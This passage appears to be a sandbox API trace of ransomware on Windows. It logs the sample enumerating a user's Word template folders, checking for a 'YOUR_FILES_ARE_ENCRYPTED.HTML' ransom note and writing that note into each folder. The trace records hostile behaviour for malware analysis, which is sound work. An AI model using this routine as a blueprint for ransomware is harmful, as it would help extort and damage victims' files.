ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Word Document Bibliography Styles", cAlternateFileName="WORDDO~2")) returned 1 [0123.225] StrStrIW (lpFirst="Word Document Bibliography Styles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.225] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles") returned 118 [0123.225] GetProcessHeap () returned 0x600000 [0123.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.225] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles" [0123.225] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\*" [0123.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.227] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.227] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9763f96c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9763f96c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9764341c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x515ca, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851216[[fn=apasixtheditionofficeonline]].xsl", cAlternateFileName="TM0285~2.XSL")) returned 1 [0123.227] StrStrIW (lpFirst="TM02851216[[fn=apasixtheditionofficeonline]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.227] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851216[[fn=apasixtheditionofficeonline]].xsl") returned 167 [0123.227] PathFindExtensionW (pszPath="TM02851216[[fn=apasixtheditionofficeonline]].xsl") returned=".xsl" [0123.227] lstrlenW (lpString=".xsl") returned 4 [0123.227] PathFindExtensionW (pszPath="TM02851216[[fn=apasixtheditionofficeonline]].xsl") returned=".xsl" [0123.227] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9779cbce, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9779cbce, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9779f2aa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486d2, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851217[[fn=chicago]].xsl", cAlternateFileName="TM0285~4.XSL")) returned 1 [0123.227] StrStrIW (lpFirst="TM02851217[[fn=chicago]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.227] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851217[[fn=chicago]].xsl") returned 147 [0123.227] PathFindExtensionW (pszPath="TM02851217[[fn=chicago]].xsl") returned=".xsl" [0123.227] lstrlenW (lpString=".xsl") returned 4 [0123.227] PathFindExtensionW (pszPath="TM02851217[[fn=chicago]].xsl") returned=".xsl" [0123.228] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97625f0b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97625f0b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9762869a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4181d, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851218[[fn=gb]].xsl", cAlternateFileName="TM0285~1.XSL")) returned 1 [0123.228] StrStrIW (lpFirst="TM02851218[[fn=gb]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.228] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851218[[fn=gb]].xsl") returned 142 [0123.228] PathFindExtensionW (pszPath="TM02851218[[fn=gb]].xsl") returned=".xsl" [0123.228] lstrlenW (lpString=".xsl") returned 4 [0123.228] PathFindExtensionW (pszPath="TM02851218[[fn=gb]].xsl") returned=".xsl" [0123.228] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978514f8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978514f8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97853bdd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e7cc, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851219[[fn=gostname]].xsl", cAlternateFileName="TM003E~1.XSL")) returned 1 [0123.228] StrStrIW (lpFirst="TM02851219[[fn=gostname]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.228] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851219[[fn=gostname]].xsl") returned 148 [0123.228] PathFindExtensionW (pszPath="TM02851219[[fn=gostname]].xsl") returned=".xsl" [0123.228] lstrlenW (lpString=".xsl") returned 4 [0123.228] PathFindExtensionW (pszPath="TM02851219[[fn=gostname]].xsl") returned=".xsl" [0123.228] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976cbe5d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x976cbe5d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x976d0c4a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d498, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851220[[fn=gosttitle]].xsl", cAlternateFileName="TM0285~3.XSL")) returned 1 [0123.228] StrStrIW (lpFirst="TM02851220[[fn=gosttitle]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.228] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851220[[fn=gosttitle]].xsl") returned 149 [0123.228] PathFindExtensionW (pszPath="TM02851220[[fn=gosttitle]].xsl") returned=".xsl" [0123.228] lstrlenW (lpString=".xsl") returned 4 [0123.228] PathFindExtensionW (pszPath="TM02851220[[fn=gosttitle]].xsl") returned=".xsl" [0123.228] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983d213f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d213f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d4a29, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x456ff, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851221[[fn=harvardanglia2008officeonline]].xsl", cAlternateFileName="TM8026~1.XSL")) returned 1 [0123.228] StrStrIW (lpFirst="TM02851221[[fn=harvardanglia2008officeonline]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.228] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851221[[fn=harvardanglia2008officeonline]].xsl") returned 169 [0123.228] PathFindExtensionW (pszPath="TM02851221[[fn=harvardanglia2008officeonline]].xsl") returned=".xsl" [0123.228] lstrlenW (lpString=".xsl") returned 4 [0123.228] PathFindExtensionW (pszPath="TM02851221[[fn=harvardanglia2008officeonline]].xsl") returned=".xsl" [0123.228] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982fc8d7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982fc8d7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x982fc8d7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x47d22, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851222[[fn=ieee2006officeonline]].xsl", cAlternateFileName="TMA855~1.XSL")) returned 1 [0123.228] StrStrIW (lpFirst="TM02851222[[fn=ieee2006officeonline]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.229] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851222[[fn=ieee2006officeonline]].xsl") returned 160 [0123.229] PathFindExtensionW (pszPath="TM02851222[[fn=ieee2006officeonline]].xsl") returned=".xsl" [0123.229] lstrlenW (lpString=".xsl") returned 4 [0123.229] PathFindExtensionW (pszPath="TM02851222[[fn=ieee2006officeonline]].xsl") returned=".xsl" [0123.229] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98050de7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98050de7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98055ce4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41f76, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851223[[fn=iso690]].xsl", cAlternateFileName="TM536F~1.XSL")) returned 1 [0123.229] StrStrIW (lpFirst="TM02851223[[fn=iso690]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.229] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851223[[fn=iso690]].xsl") returned 146 [0123.229] PathFindExtensionW (pszPath="TM02851223[[fn=iso690]].xsl") returned=".xsl" [0123.229] lstrlenW (lpString=".xsl") returned 4 [0123.229] PathFindExtensionW (pszPath="TM02851223[[fn=iso690]].xsl") returned=".xsl" [0123.229] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977efc44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977efc44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977f0f37, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x35031, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851224[[fn=iso690nmerical]].xsl", cAlternateFileName="TM9858~1.XSL")) returned 1 [0123.229] StrStrIW (lpFirst="TM02851224[[fn=iso690nmerical]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.229] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851224[[fn=iso690nmerical]].xsl") returned 154 [0123.229] PathFindExtensionW (pszPath="TM02851224[[fn=iso690nmerical]].xsl") returned=".xsl" [0123.229] lstrlenW (lpString=".xsl") returned 4 [0123.229] PathFindExtensionW (pszPath="TM02851224[[fn=iso690nmerical]].xsl") returned=".xsl" [0123.229] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9786c3ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9786c3ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9786d825, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e39b, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", cAlternateFileName="TM49BE~1.XSL")) returned 1 [0123.229] StrStrIW (lpFirst="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.229] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851225[[fn=mlaseventheditionofficeonline]].xsl") returned 169 [0123.229] PathFindExtensionW (pszPath="TM02851225[[fn=mlaseventheditionofficeonline]].xsl") returned=".xsl" [0123.229] lstrlenW (lpString=".xsl") returned 4 [0123.229] PathFindExtensionW (pszPath="TM02851225[[fn=mlaseventheditionofficeonline]].xsl") returned=".xsl" [0123.229] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977a2c28, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977a2c28, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977a3fe6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x540ef, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851226[[fn=turabian]].xsl", cAlternateFileName="TME914~1.XSL")) returned 1 [0123.229] StrStrIW (lpFirst="TM02851226[[fn=turabian]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.229] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851226[[fn=turabian]].xsl") returned 148 [0123.229] PathFindExtensionW (pszPath="TM02851226[[fn=turabian]].xsl") returned=".xsl" [0123.229] lstrlenW (lpString=".xsl") returned 4 [0123.230] PathFindExtensionW (pszPath="TM02851226[[fn=turabian]].xsl") returned=".xsl" [0123.230] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 1 [0123.230] StrStrIW (lpFirst="TM02851227[[fn=sist02]].xsl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.230] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851227[[fn=sist02]].xsl") returned 146 [0123.230] PathFindExtensionW (pszPath="TM02851227[[fn=sist02]].xsl") returned=".xsl" [0123.230] lstrlenW (lpString=".xsl") returned 4 [0123.230] PathFindExtensionW (pszPath="TM02851227[[fn=sist02]].xsl") returned=".xsl" [0123.230] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 0 [0123.230] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.230] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0123.231] GetProcessHeap () returned 0x600000 [0123.231] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.233] WriteFile (in: hFile=0x30c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.234] CloseHandle (hObject=0x30c) returned 1 [0123.234] GetProcessHeap () returned 0x600000 [0123.234] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.234] GetProcessHeap () returned 0x600000 [0123.234] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.234] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 1 [0123.235] StrStrIW (lpFirst="Word Document Building Blocks", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.235] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks") returned 114 [0123.235] GetProcessHeap () returned 0x600000 [0123.235] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.235] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks" [0123.235] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\*" [0123.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.235] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.235] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 1 [0123.235] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.235] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033") returned 119 [0123.235] GetProcessHeap () returned 0x600000 [0123.235] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.235] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033" [0123.236] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\*" [0123.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, 